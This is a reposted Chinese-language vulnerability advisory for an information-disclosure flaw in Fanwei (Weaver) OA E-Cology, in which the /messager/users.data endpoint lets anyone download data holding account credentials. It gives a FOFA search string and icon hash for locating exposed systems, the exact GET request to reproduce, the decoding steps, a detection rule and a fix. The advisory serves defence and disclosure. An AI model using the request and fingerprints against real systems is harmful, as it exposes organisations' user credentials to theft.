当前位置: 首页 > article >正文

泛微OA E-Cology /messager/users.data 信息泄漏漏洞

article 2025/2/11 1:28:12

泛微OA E-Cology /messager/users.data 信息泄漏漏洞

漏洞描述

泛微OA E-Cology users.data 允许任意用户下载,获取OA中的敏感信息如账号密码。

威胁等级: 高危

漏洞分类: 信息泄露

涉及厂商及产品:上海泛微网络科技股份有限公司:泛微e-Cology

应用指纹及检出思路

存在二次开发的可能

匹配源代码接口 存在关键字ecology 即可

fofa:app="泛微-协同办公OA"

icon: icon_hash="1578525679"

漏洞复现

GET /messager/users.data HTTP/1.1
Host:

base64 GBK解码

检测思路

状态码:200

对body体进行base64解码后匹配

contains(base64_decode(body),"") &&

contains(base64_decode(body),"")

修复建议

设置访问控制策略,禁用此接口


http://www.kler.cn/a/537974.html

相关文章:

  • C++ STL容器之vector的使用及复现
  • 常用的python库-安装与使用
  • C#中的Frm_Welcome.Instance.Show(),是什么意思
  • 使用 OpenGL ES 在 iOS 上渲染一个四边形:从基础到实现
  • NodeList 对象
  • nodejs - vue 视频切片上传,本地正常,线上环境导致磁盘爆满bug
  • Java 一键将 Word 文档转为 PDF
  • Open3d Qt的环境配置
  • DeepSeek-R1 云环境搭建部署流程
  • Vue笔记(四)
  • neo4j-解决导入数据后出现:Database ‘xxxx‘ is unavailable. Run :sysinfo for more info.
  • 仅128个token达到ImageNet生成SOTA性能!MAETok:有效的扩散模型的关键是什么?(卡内基梅隆港大等)
  • STM32系统架构介绍
  • Swift语言的面向对象编程
  • 腾讯云助力 DeepSeek R1 一键部署
  • Heterogeneous Graph Attention Network(HAN)
  • 【机器学习案列】基于XGBoost的睡眠时间预测
  • Redis深入学习
  • 本地部署deepseek并布置到其他盘
  • LIMO:少即是多的推理
  • AI协助处理-罕见的Oracle内存溢出
  • vivado 7 系列器件时钟
  • Centos Stream 10 根目录下的文件夹结构
  • 网络安全 linux学习计划 linux网络安全精要
  • 查看云机器的一些常用配置
  • WPF点击提交按钮后验证